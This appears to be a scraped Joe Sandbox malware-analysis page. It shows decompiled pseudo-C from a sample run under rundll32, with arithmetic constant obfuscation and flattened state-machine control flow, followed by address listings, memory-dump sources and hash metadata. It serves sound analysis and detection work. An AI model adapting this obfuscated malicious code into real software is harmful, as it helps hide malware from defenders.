				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				intOrPtr _t236;
				void* _t241;
				short* _t244;
				void* _t247;
				void* _t250;
				intOrPtr _t256;
				intOrPtr _t272;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int* _t283;

				_t283 =  &_v1156;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t250 = 0x1242b9;
				_v1056 = 0xc74a30;
				_v1052 = 0xdc93e6;
				_v1140 = 0x94ae82;
				_v1140 = _v1140 * 0x5d;
				_v1140 = _v1140 | 0xd08f5b59;
				_t278 = 0x3b;
				_v1140 = _v1140 / _t278;
				_v1140 = _v1140 ^ 0x042b78b4;
				_v1060 = 0xf2c7d8;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x000b32e4;
				_v1084 = 0xadf7c1;
				_v1084 = _v1084 >> 7;
				_v1084 = _v1084 ^ 0x0005ae79;
				_v1068 = 0x4ca2f2;
				_v1068 = _v1068 | 0x7f3e9315;
				_v1068 = _v1068 ^ 0x7f77e091;
				_v1148 = 0xfaa01c;
				_v1148 = _v1148 | 0x0a84fcb5;
				_t279 = 0x3d;
				_v1148 = _v1148 / _t279;
				_v1148 = _v1148 + 0xffff92ee;
				_v1148 = _v1148 ^ 0x0020489e;
				_v1104 = 0xbd50a4;
				_v1104 = _v1104 | 0x802f8c80;
				_v1104 = _v1104 ^ 0xe2a4d8db;
				_v1104 = _v1104 ^ 0x621899e9;
				_v1096 = 0x4ec4a;
				_t280 = 0x27;
				_v1096 = _v1096 / _t280;
				_v1096 = _v1096 ^ 0x000ca7f0;
				_v1156 = 0x496e13;
				_v1156 = _v1156 << 0xb;
				_v1156 = _v1156 + 0xffff34c4;
				_v1156 = _v1156 ^ 0xea67072b;
				_v1156 = _v1156 ^ 0xa10c07e0;
				_v1132 = 0x5417d7;
				_v1132 = _v1132 ^ 0x2d0a29d3;
				_v1132 = _v1132 * 0x11;
				_v1132 = _v1132 ^ 0x95d68b4c;
				_v1132 = _v1132 ^ 0x969bce68;
				_v1108 = 0x3d434d;
				_t83 =  &_v1108; // 0x3d434d
				_v1108 =  *_t83 * 0x5d;
				_v1108 = _v1108 + 0xbd1d;
				_v1108 = _v1108 ^ 0x16426462;
				_v1064 = 0x905f90;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x482aff2b;
				_v1076 = 0xa70fe8;
				_v1076 = _v1076 ^ 0x0f6696b3;
				_v1076 = _v1076 ^ 0x0fce7292;
				_v1144 = 0x5add64;
				_v1144 = _v1144 * 0x72;
				_v1144 = _v1144 >> 2;
				_v1144 = _v1144 + 0xffffbbe0;
				_v1144 = _v1144 ^ 0x0a105df6;
				_v1112 = 0xa934e1;
				_v1112 = _v1112 + 0xffff3dc6;
				_v1112 = _v1112 ^ 0xf71e7087;
				_v1112 = _v1112 ^ 0xf7bbdd65;
				_v1152 = 0xfe7bab;
				_v1152 = _v1152 + 0xffffe121;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 + 0xffffae88;
				_v1152 = _v1152 ^ 0x7f211c18;
				_v1092 = 0x242707;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x0003c6d8;
				_v1136 = 0xebac4f;
				_v1136 = _v1136 + 0x4c15;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0xdf38e0e8;
				_v1136 = _v1136 ^ 0xdf3b1dfc;
				_v1120 = 0x4eb7ab;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 + 0xffff85cc;
				_v1120 = _v1120 ^ 0x01347c50;
				_v1088 = 0xc2f923;
				_v1088 = _v1088 * 0xf;
				_v1088 = _v1088 ^ 0x0b6c1f22;
				_v1080 = 0xbf02c1;
				_v1080 = _v1080 + 0xffffcd4c;
				_v1080 = _v1080 ^ 0x00bd8b7d;
				_v1128 = 0xfef10;
				_v1128 = _v1128 + 0xfa25;
				_v1128 = _v1128 + 0xffffb342;
				_v1128 = _v1128 + 0x2fe7;
				_v1128 = _v1128 ^ 0x00107547;
				_v1116 = 0x30091d;
				_v1116 = _v1116 | 0x682f5e67;
				_v1116 = _v1116 * 0xf;
				_v1116 = _v1116 ^ 0x1bb1960a;
				_v1100 = 0xdd7fbe;
				_v1100 = _v1100 >> 0xf;
				_v1100 = _v1100 + 0xffff26d4;
				_v1100 = _v1100 ^ 0xfff0a895;
				_v1072 = 0xd8d782;
				_v1072 = _v1072 + 0xffff857d;
				_v1072 = _v1072 ^ 0x00daabd2;
				_v1124 = 0x615b7c;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 * 0x3d;
				_v1124 = _v1124 ^ 0x000147a1;
				L1:
				while(_t250 != 0x1242b9) {
					if(_t250 == 0x56337fc) {
						E00386C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
						_push(_v1088);
						_push( &_v520);
						_push(_v1120);
						E003913AD(_v1136,  &_v1040, __eflags);
						_t283 =  &(_t283[6]);
						_t250 = 0x8d6676f;
						continue;
					}
					if(_t250 == 0x5f94146) {
						_push(_v1148);
						_push(_v1068);
						_t241 = E0038DCF7(_v1084, 0x371000, __eflags);
						_t256 =  *0x393e10; // 0x0
						_t272 =  *0x393e10; // 0x0
						E003747CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
						E0037A8B0(_v1064, _t241, _v1076);
						_t283 =  &(_t283[9]);
						_t250 = 0x56337fc;
						continue;
					}
					if(_t250 == 0x8d6676f) {
						_t244 = E0037B6CF( &_v1040, _v1080, _v1128, _v1116);
						__eflags = 0;
						 *_t244 = 0;
						return E0037B1C6( &_v1040, _v1100, _v1072, _v1124);
					}
					if(_t250 == 0xbcbde3e) {
						_t247 = E0038473C();
						L8:
						_t250 = 0x5f94146;
						continue;
					}
					if(_t250 != 0xf4317dc) {
						L15:
						__eflags = _t250 - 0xfb0317f;
						if(__eflags != 0) {
							continue;
						}
						return _t247;
					}
					_t247 = E00373E3F();
					goto L8;
				}
				_t236 =  *0x393e10; // 0x0
				__eflags =  *((intOrPtr*)(_t236 + 0x450));
				if(__eflags == 0) {
					_t250 = 0xf4317dc;
					goto L15;
				}
				_t250 = 0xbcbde3e;
				goto L1;
			}













































                                                                                                                                                            0x00387dd5
                                                                                                                                                            0x00387ddb
                                                                                                                                                            0x00387de2
                                                                                                                                                            0x00387de7
                                                                                                                                                            0x00387dec
                                                                                                                                                            0x00387df4
                                                                                                                                                            0x00387dfc
                                                                                                                                                            0x00387e0d
                                                                                                                                                            0x00387e11
                                                                                                                                                            0x00387e1f
                                                                                                                                                            0x00387e24
                                                                                                                                                            0x00387e2a
                                                                                                                                                            0x00387e32
                                                                                                                                                            0x00387e3a
                                                                                                                                                            0x00387e3f
                                                                                                                                                            0x00387e47
                                                                                                                                                            0x00387e4f
                                                                                                                                                            0x00387e54
                                                                                                                                                            0x00387e5c
                                                                                                                                                            0x00387e64
                                                                                                                                                            0x00387e6c
                                                                                                                                                            0x00387e74
                                                                                                                                                            0x00387e7c
                                                                                                                                                            0x00387e88
                                                                                                                                                            0x00387e8d
                                                                                                                                                            0x00387e93
                                                                                                                                                            0x00387e9b
                                                                                                                                                            0x00387ea3
                                                                                                                                                            0x00387eab
                                                                                                                                                            0x00387eb3
                                                                                                                                                            0x00387ebb
                                                                                                                                                            0x00387ec3
                                                                                                                                                            0x00387ecf
                                                                                                                                                            0x00387ed2
                                                                                                                                                            0x00387ed6
                                                                                                                                                            0x00387ede
                                                                                                                                                            0x00387ee6
                                                                                                                                                            0x00387eeb
                                                                                                                                                            0x00387ef3
                                                                                                                                                            0x00387efb
                                                                                                                                                            0x00387f03
                                                                                                                                                            0x00387f0b
                                                                                                                                                            0x00387f18
                                                                                                                                                            0x00387f1c
                                                                                                                                                            0x00387f24
                                                                                                                                                            0x00387f2c
                                                                                                                                                            0x00387f34
                                                                                                                                                            0x00387f39
                                                                                                                                                            0x00387f3d
                                                                                                                                                            0x00387f45
                                                                                                                                                            0x00387f4d
                                                                                                                                                            0x00387f55
                                                                                                                                                            0x00387f5a
                                                                                                                                                            0x00387f62
                                                                                                                                                            0x00387f6a
                                                                                                                                                            0x00387f72
                                                                                                                                                            0x00387f7a
                                                                                                                                                            0x00387f87
                                                                                                                                                            0x00387f8b
                                                                                                                                                            0x00387f90
                                                                                                                                                            0x00387f98
                                                                                                                                                            0x00387fa0
                                                                                                                                                            0x00387fa8
                                                                                                                                                            0x00387fb0
                                                                                                                                                            0x00387fbd
                                                                                                                                                            0x00387fca
                                                                                                                                                            0x00387fd7
                                                                                                                                                            0x00387fdf
                                                                                                                                                            0x00387fe4
                                                                                                                                                            0x00387fec
                                                                                                                                                            0x00387ff4
                                                                                                                                                            0x00387ffc
                                                                                                                                                            0x00388001
                                                                                                                                                            0x00388009
                                                                                                                                                            0x00388011
                                                                                                                                                            0x00388019
                                                                                                                                                            0x0038801e
                                                                                                                                                            0x00388026
                                                                                                                                                            0x0038802e
                                                                                                                                                            0x00388036
                                                                                                                                                            0x0038803b
                                                                                                                                                            0x00388043
                                                                                                                                                            0x0038804b
                                                                                                                                                            0x00388058
                                                                                                                                                            0x0038805c
                                                                                                                                                            0x00388064
                                                                                                                                                            0x0038806c
                                                                                                                                                            0x00388074
                                                                                                                                                            0x0038807c
                                                                                                                                                            0x00388084
                                                                                                                                                            0x0038808c
                                                                                                                                                            0x00388094
                                                                                                                                                            0x0038809c
                                                                                                                                                            0x003880a4
                                                                                                                                                            0x003880ac
                                                                                                                                                            0x003880b9
                                                                                                                                                            0x003880bd
                                                                                                                                                            0x003880c5
                                                                                                                                                            0x003880cd
                                                                                                                                                            0x003880d2
                                                                                                                                                            0x003880da
                                                                                                                                                            0x003880e2
                                                                                                                                                            0x003880ea
                                                                                                                                                            0x003880f2
                                                                                                                                                            0x003880fa
                                                                                                                                                            0x00388102
                                                                                                                                                            0x0038810c
                                                                                                                                                            0x00388110
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388118
                                                                                                                                                            0x0038812a
                                                                                                                                                            0x003881f0
                                                                                                                                                            0x003881f5
                                                                                                                                                            0x00388200
                                                                                                                                                            0x00388201
                                                                                                                                                            0x00388210
                                                                                                                                                            0x00388215
                                                                                                                                                            0x00388218
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388218
                                                                                                                                                            0x00388132
                                                                                                                                                            0x00388164
                                                                                                                                                            0x0038816d
                                                                                                                                                            0x00388175
                                                                                                                                                            0x00388186
                                                                                                                                                            0x0038819e
                                                                                                                                                            0x003881b1
                                                                                                                                                            0x003881c6
                                                                                                                                                            0x003881cb
                                                                                                                                                            0x003881ce
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003881ce
                                                                                                                                                            0x0038813a
                                                                                                                                                            0x0038825a
                                                                                                                                                            0x00388263
                                                                                                                                                            0x0038826d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038827c
                                                                                                                                                            0x00388142
                                                                                                                                                            0x0038815d
                                                                                                                                                            0x00388155
                                                                                                                                                            0x00388155
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388155
                                                                                                                                                            0x00388146
                                                                                                                                                            0x00388239
                                                                                                                                                            0x00388239
                                                                                                                                                            0x0038823f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038823f
                                                                                                                                                            0x00388150
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388150
                                                                                                                                                            0x00388222
                                                                                                                                                            0x00388227
                                                                                                                                                            0x0038822e
                                                                                                                                                            0x00388237
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388237
                                                                                                                                                            0x00388230
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: MC=$g^/h$|[a$/
                                                                                                                                                            • API String ID: 0-1545830693
                                                                                                                                                            • Opcode ID: 1d3966bd5d5f96d3a6d87ec4215b7e6fed083ec5c9eec0ea98fa54c947001be6
                                                                                                                                                            • Instruction ID: c4b6ee3baa9cc41c08354ce30b415086dc95c23b9105b76ecc0bae6e4b49ac18
                                                                                                                                                            • Opcode Fuzzy Hash: 1d3966bd5d5f96d3a6d87ec4215b7e6fed083ec5c9eec0ea98fa54c947001be6
                                                                                                                                                            • Instruction Fuzzy Hash: 85C10EB11083818FC769DF25C58A91BFBF1BBC0758F508A1DF1969A260D7B58A4ACF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038A2E8 Relevance: 5.2, Strings: 4, Instructions: 201COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E0038A2E8(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t184;
				intOrPtr* _t189;
				intOrPtr _t193;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int* _t231;

				_t198 = __ecx;
				_t231 =  &_v92;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0x24c7b9;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x498f7200;
				_v76 = 0x5897f7;
				_v76 = _v76 + 0xffffedf4;
				_v76 = _v76 << 0xf;
				_v76 = _v76 + 0x73e5;
				_v76 = _v76 ^ 0x42f7f56f;
				_v52 = 0x46ab19;
				_v52 = _v52 << 0xd;
				_t228 = 0xe611c04;
				_v20 = _v20 & 0x00000000;
				_t223 = 0x66;
				_v52 = _v52 / _t223;
				_v52 = _v52 ^ 0x0211beab;
				_v80 = 0x97c948;
				_v80 = _v80 ^ 0xfb972484;
				_v80 = _v80 << 2;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xdb950905;
				_v44 = 0x96980f;
				_v44 = _v44 ^ 0xfeb8bb56;
				_v44 = _v44 ^ 0xfe2f3013;
				_v64 = 0x454cfa;
				_v64 = _v64 ^ 0x45fe36ac;
				_t224 = 0x43;
				_v64 = _v64 / _t224;
				_v64 = _v64 ^ 0x010b84d0;
				_v68 = 0xb73a82;
				_v68 = _v68 | 0xd419dac3;
				_t225 = 0x23;
				_v68 = _v68 / _t225;
				_v68 = _v68 ^ 0x061f1f3c;
				_v60 = 0xe80863;
				_v60 = _v60 * 7;
				_v60 = _v60 ^ 0x88fb80a0;
				_v60 = _v60 ^ 0x8ea007f2;
				_v40 = 0x80f530;
				_v40 = _v40 ^ 0xcef24483;
				_v40 = _v40 ^ 0xce7935e2;
				_v92 = 0x233377;
				_v92 = _v92 ^ 0x61e14959;
				_v92 = _v92 + 0xffffa5e4;
				_v92 = _v92 + 0xf94b;
				_v92 = _v92 ^ 0x61c7ad44;
				_v88 = 0xbad9cc;
				_v88 = _v88 | 0x5a2a09a8;
				_v88 = _v88 * 0x2f;
				_v88 = _v88 | 0xecc1c683;
				_v88 = _v88 ^ 0xecc3849f;
				_v56 = 0xb0d301;
				_v56 = _v56 + 0xa0bb;
				_v56 = _v56 << 0xf;
				_v56 = _v56 ^ 0xb9db0742;
				_v36 = 0xab48cf;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x1811952a;
				_v84 = 0x104632;
				_v84 = _v84 + 0x4a21;
				_v84 = _v84 ^ 0x8dbd106a;
				_v84 = _v84 + 0xfe54;
				_v84 = _v84 ^ 0x8daed025;
				_t226 = _v4;
				_t197 = _v8;
				_t230 = _v8;
				_v72 = 0x1611ea;
				_v72 = _v72 ^ 0xe055e86d;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x0003993e;
				_v32 = 0x799484;
				_v32 = _v32 ^ 0xb4488d59;
				_v32 = _v32 ^ 0xb439947f;
				L1:
				while(1) {
					do {
						while(_t228 != 0x5161e0c) {
							if(_t228 == 0xb95f952) {
								_t229 = E0038C032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
								_t231 =  &(_t231[5]);
								_v20 = _t229;
								if(_t229 == 0) {
									L18:
									E00388519(_v72, _v32, _t197);
								} else {
									_t204 = _v16;
									if(_t204 == 0) {
										L17:
										if(_t229 != 0) {
											_t189 = _v8;
											 *_t189 = _t197;
											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
										} else {
											goto L18;
										}
									} else {
										_v48 = _v48 + _t204;
										_t230 = _t230 - _t204;
										if(_t230 != 0) {
											L10:
											_t184 = _v48;
											L11:
											_t198 = _v24;
											_t228 = 0xb95f952;
											continue;
										} else {
											_t205 = _t226 + _t226;
											_push(_t205);
											_push(_t205);
											_v12 = _t205;
											_t193 = E00377FF2(_t205);
											_v48 = _t193;
											if(_t193 == 0) {
												goto L17;
											} else {
												E0037ED7E(_v88, _t193, _v56, _t197, _t226);
												E00388519(_v36, _v84, _t197);
												_t197 = _v48;
												_t230 = _t226;
												_t231 =  &(_t231[4]);
												_t196 = _t197 + _t226;
												_t226 = _v12;
												_v48 = _t196;
												if(_t230 == 0) {
													goto L17;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t228 != 0xe611c04) {
									goto L15;
								} else {
									_t228 = 0x5161e0c;
									continue;
								}
							}
							L20:
							return _t229;
						}
						_t226 = 0x10000;
						_push(_t198);
						_push(_t198);
						_t184 = E00377FF2(0x10000);
						_t197 = _t184;
						if(_t197 == 0) {
							_t198 = _v24;
							_t228 = 0xa3056fc;
							goto L15;
						} else {
							_v48 = _t184;
							_t230 = 0x10000;
							goto L11;
						}
						goto L20;
						L15:
						_t184 = _v48;
					} while (_t228 != 0xa3056fc);
					_t229 = _v20;
					goto L17;
				}
			}










































                                                                                                                                                            0x0038a2e8
                                                                                                                                                            0x0038a2e8
                                                                                                                                                            0x0038a2ef
                                                                                                                                                            0x0038a2f3
                                                                                                                                                            0x0038a2f7
                                                                                                                                                            0x0038a2ff
                                                                                                                                                            0x0038a304
                                                                                                                                                            0x0038a30c
                                                                                                                                                            0x0038a314
                                                                                                                                                            0x0038a31c
                                                                                                                                                            0x0038a321
                                                                                                                                                            0x0038a329
                                                                                                                                                            0x0038a331
                                                                                                                                                            0x0038a339
                                                                                                                                                            0x0038a342
                                                                                                                                                            0x0038a34b
                                                                                                                                                            0x0038a350
                                                                                                                                                            0x0038a355
                                                                                                                                                            0x0038a35b
                                                                                                                                                            0x0038a363
                                                                                                                                                            0x0038a36b
                                                                                                                                                            0x0038a373
                                                                                                                                                            0x0038a378
                                                                                                                                                            0x0038a37d
                                                                                                                                                            0x0038a385
                                                                                                                                                            0x0038a38d
                                                                                                                                                            0x0038a395
                                                                                                                                                            0x0038a39d
                                                                                                                                                            0x0038a3a5
                                                                                                                                                            0x0038a3b1
                                                                                                                                                            0x0038a3b6
                                                                                                                                                            0x0038a3bc
                                                                                                                                                            0x0038a3c4
                                                                                                                                                            0x0038a3cc
                                                                                                                                                            0x0038a3d8
                                                                                                                                                            0x0038a3db
                                                                                                                                                            0x0038a3df
                                                                                                                                                            0x0038a3e7
                                                                                                                                                            0x0038a3f4
                                                                                                                                                            0x0038a3f8
                                                                                                                                                            0x0038a400
                                                                                                                                                            0x0038a408
                                                                                                                                                            0x0038a410
                                                                                                                                                            0x0038a418
                                                                                                                                                            0x0038a420
                                                                                                                                                            0x0038a428
                                                                                                                                                            0x0038a430
                                                                                                                                                            0x0038a438
                                                                                                                                                            0x0038a440
                                                                                                                                                            0x0038a448
                                                                                                                                                            0x0038a450
                                                                                                                                                            0x0038a45d
                                                                                                                                                            0x0038a461
                                                                                                                                                            0x0038a469
                                                                                                                                                            0x0038a471
                                                                                                                                                            0x0038a479
                                                                                                                                                            0x0038a481
                                                                                                                                                            0x0038a486
                                                                                                                                                            0x0038a48e
                                                                                                                                                            0x0038a49b
                                                                                                                                                            0x0038a49f
                                                                                                                                                            0x0038a4a7
                                                                                                                                                            0x0038a4af
                                                                                                                                                            0x0038a4b7
                                                                                                                                                            0x0038a4bf
                                                                                                                                                            0x0038a4c7
                                                                                                                                                            0x0038a4cf
                                                                                                                                                            0x0038a4d3
                                                                                                                                                            0x0038a4d7
                                                                                                                                                            0x0038a4df
                                                                                                                                                            0x0038a4e7
                                                                                                                                                            0x0038a4ef
                                                                                                                                                            0x0038a4f4
                                                                                                                                                            0x0038a4f9
                                                                                                                                                            0x0038a501
                                                                                                                                                            0x0038a509
                                                                                                                                                            0x0038a511
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a519
                                                                                                                                                            0x0038a519
                                                                                                                                                            0x0038a519
                                                                                                                                                            0x0038a52b
                                                                                                                                                            0x0038a559
                                                                                                                                                            0x0038a55b
                                                                                                                                                            0x0038a55e
                                                                                                                                                            0x0038a564
                                                                                                                                                            0x0038a63c
                                                                                                                                                            0x0038a645
                                                                                                                                                            0x0038a56a
                                                                                                                                                            0x0038a56a
                                                                                                                                                            0x0038a570
                                                                                                                                                            0x0038a638
                                                                                                                                                            0x0038a63a
                                                                                                                                                            0x0038a651
                                                                                                                                                            0x0038a657
                                                                                                                                                            0x0038a659
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a576
                                                                                                                                                            0x0038a576
                                                                                                                                                            0x0038a57a
                                                                                                                                                            0x0038a57c
                                                                                                                                                            0x0038a5df
                                                                                                                                                            0x0038a5df
                                                                                                                                                            0x0038a5e3
                                                                                                                                                            0x0038a5e3
                                                                                                                                                            0x0038a5e7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a57e
                                                                                                                                                            0x0038a582
                                                                                                                                                            0x0038a58f
                                                                                                                                                            0x0038a590
                                                                                                                                                            0x0038a591
                                                                                                                                                            0x0038a595
                                                                                                                                                            0x0038a59a
                                                                                                                                                            0x0038a5a2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a5a8
                                                                                                                                                            0x0038a5b4
                                                                                                                                                            0x0038a5c2
                                                                                                                                                            0x0038a5c7
                                                                                                                                                            0x0038a5cb
                                                                                                                                                            0x0038a5cd
                                                                                                                                                            0x0038a5d0
                                                                                                                                                            0x0038a5d3
                                                                                                                                                            0x0038a5d7
                                                                                                                                                            0x0038a5dd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a5dd
                                                                                                                                                            0x0038a5a2
                                                                                                                                                            0x0038a57c
                                                                                                                                                            0x0038a570
                                                                                                                                                            0x0038a52d
                                                                                                                                                            0x0038a533
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a539
                                                                                                                                                            0x0038a539
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a539
                                                                                                                                                            0x0038a533
                                                                                                                                                            0x0038a65d
                                                                                                                                                            0x0038a665
                                                                                                                                                            0x0038a665
                                                                                                                                                            0x0038a5f5
                                                                                                                                                            0x0038a604
                                                                                                                                                            0x0038a605
                                                                                                                                                            0x0038a606
                                                                                                                                                            0x0038a60b
                                                                                                                                                            0x0038a611
                                                                                                                                                            0x0038a61b
                                                                                                                                                            0x0038a61f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a613
                                                                                                                                                            0x0038a613
                                                                                                                                                            0x0038a617
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a617
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a624
                                                                                                                                                            0x0038a624
                                                                                                                                                            0x0038a628
                                                                                                                                                            0x0038a634
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a634

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !J$YIa$mU$s
                                                                                                                                                            • API String ID: 0-3335770892
                                                                                                                                                            • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                                            • Instruction ID: 3d635f4bd0141e00b6d4cb0e4ae73a0b1eabb213a8d73cb559f3ffebbc44b838
                                                                                                                                                            • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                                            • Instruction Fuzzy Hash: 15913FB19093809BC355DF29C18580BFBF1BBC5B58F548A5EF9959B220D3B4DA09CB83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00374EE3 Relevance: 5.2, Strings: 4, Instructions: 168COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00374EE3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				void* _t203;
				void* _t204;
				void* _t207;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				void* _t221;

				_v84 = _v84 & 0x00000000;
				_v88 = 0xf9097a;
				_v32 = 0xbcbe1d;
				_v32 = _v32 << 9;
				_v32 = _v32 << 9;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xa0062323;
				_v16 = 0x782140;
				_v16 = _v16 + 0xfffffe34;
				_v16 = _v16 + 0xfffffe18;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xe0701d9a;
				_v40 = 0x7af846;
				_v40 = _v40 + 0xffff28b3;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0xffffd351;
				_v40 = _v40 ^ 0x441384bc;
				_v68 = 0xebfd4;
				_v68 = _v68 + 0xffff2b98;
				_t212 = 0x4b;
				_v68 = _v68 / _t212;
				_v68 = _v68 ^ 0x000f3184;
				_v48 = 0x77c678;
				_t213 = 0x72;
				_v48 = _v48 * 0x4d;
				_v48 = _v48 + 0x6b8c;
				_v48 = _v48 ^ 0x240efbe4;
				_v24 = 0xae1064;
				_v24 = _v24 / _t213;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x1be7fa9d;
				_v24 = _v24 ^ 0x1b226397;
				_v72 = 0x44bde7;
				_v72 = _v72 | 0x5f63ee23;
				_v72 = _v72 ^ 0x5f6de837;
				_v56 = 0x5a94a4;
				_v56 = _v56 >> 9;
				_t214 = 0xc;
				_v56 = _v56 * 0x2a;
				_v56 = _v56 ^ 0x0003dc1b;
				_v8 = 0x2a4d30;
				_v8 = _v8 + 0xff2b;
				_v8 = _v8 | 0x9a82811b;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xbcdbc31f;
				_v64 = 0xa41a91;
				_v64 = _v64 | 0x62aa1889;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xc357e7aa;
				_v36 = 0x90fe9;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x57d87c49;
				_v36 = _v36 / _t214;
				_v36 = _v36 ^ 0x0755636a;
				_v28 = 0x5fda7e;
				_v28 = _v28 + 0xffff2d0f;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xdffb;
				_v28 = _v28 ^ 0x7c1a8a5e;
				_v20 = 0xaf632f;
				_v20 = _v20 >> 8;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0003fa93;
				_v12 = 0x960758;
				_v12 = _v12 ^ 0x64ee01f0;
				_v12 = _v12 | 0x3d3dd2ba;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xbeed48c5;
				_v80 = 0xba0fdf;
				_v80 = _v80 + 0xfd2d;
				_v80 = _v80 ^ 0x00b93168;
				_v60 = 0x5f834c;
				_v60 = _v60 ^ 0x963b7b6a;
				_t215 = 0x3f;
